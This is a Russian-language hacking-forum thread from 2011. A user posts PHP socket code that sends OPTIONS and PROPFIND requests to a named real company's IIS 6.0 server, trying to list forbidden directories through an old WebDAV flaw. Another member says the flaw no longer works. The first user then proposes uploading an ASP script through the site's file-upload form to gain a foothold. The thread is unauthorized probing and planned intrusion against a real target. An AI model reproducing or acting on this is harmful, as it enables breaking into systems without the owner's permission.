IIS 6.0 WebDav Листинг Директории
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
IIS 6.0 WebDav Листинг Директории - 2011-10-17 18:58:48.270000
|
|
|
inx_x
Сообщений: 3
Оценки: 0
Присоединился: 2011-10-17 18:32:34.743333
|
Структуру каталогов сайта я знаю. Листинг запрещен.
Начал делать согласно статье http://www.xakep.ru/magazine/xa/126/042/1.asp
Пишу на php, с использованием сокетов.
<?php
$host = 'www.telechips.com';
$port = 80;
function send($headers, $str = null){
GLOBAL $host, $port;
$OutData = '';
$strA = is_null($str) ? '<br />' : $str;
$SockHDC = fsockopen(gethostbyname($host), $port);
if (!$SockHDC){
return 0;
}
fputs($SockHDC,$headers);
while (!feof($SockHDC)) {
$OutData .= fgets($SockHDC).'<br />';
}
fclose($SockHDC);
return $OutData;
}
$headers = "OPTIONS / HTTP/1.1\r\n";
$headers.= "Host: ".$host."\r\n";
$headers.= "Connection: close\r\n\r\n";
return send($headers);
?>
Получаю ответ:
quote:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 17 Oct 2011 14:43:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
MS-Author-Via: DAV
Content-Length: 0
Accept-Ranges: none
DASL:
DAV: 1, 2
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Allow: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
Cache-Control: private
Видно, что WebDav подключен.
Продолжаю копать.
$xml = '<?xml version="1.0" encoding="utf-8"?>
<propfind xmlns="DAV:"><prop>
<getcontentlength xmlns="DAV:"/>
<getlastmodified xmlns="DAV:"/>
<resourcetype xmlns="DAV:"/>
<checked-in xmlns="DAV:"/>
<checked-out xmlns="DAV:"/>
</prop></propfind>';
$headers = "PROPFIND /webupload/ HTTP/1.1\r\n";
$headers.= "Host: www.telechips.com\r\n";
$headers.= "User-Agent: Mozilla\r\n";
$headers.= "Connection: TE\r\n";
$headers.= "TE: trailers\r\n";
$headers.= "Depth: 1\r\n";
$headers.= "Content-Length: ".strlen($xml)."\r\n";
$headers.= "Content-Type: text/xml\r\n\r\n";
$headers.= $xml;
$headers.= "\r\n\r\n";
return send($headers);
Ответа от сервера не получаю =(. т.е. страница просто грузиться и все. Кто-нибудь пробовал данный метод на практике?
|
|
|
|
|
RE: IIS 6.0 WebDav Листинг Директории - 2011-10-18 10:33:50.710000
|
|
|
Pupkin-Zade
Сообщений: 9398
Оценки: 1489
Присоединился: 2004-03-10 13:54:16
|
Ну так эта уязвимость не работает давно, почему вы думаете что получите что-то?
|
|
|
|
|
RE: IIS 6.0 WebDav Листинг Директории - 2011-10-18 16:51:32.203333
|
|
|
inx_x
Сообщений: 3
Оценки: 0
Присоединился: 2011-10-17 18:32:34.743333
|
Есть ли еще какие-нибудь способы получить содержимое каталога?
Пока только есть бредовая идея. На сайте есть возможность загрузить файл. Узнать бы каталог, в который все это кладется. Если имя файла не меняется, то можно попробовать закинуть asp-скрипт. Кста заливаются файлы любого типа.
|
|
|
|
|
|
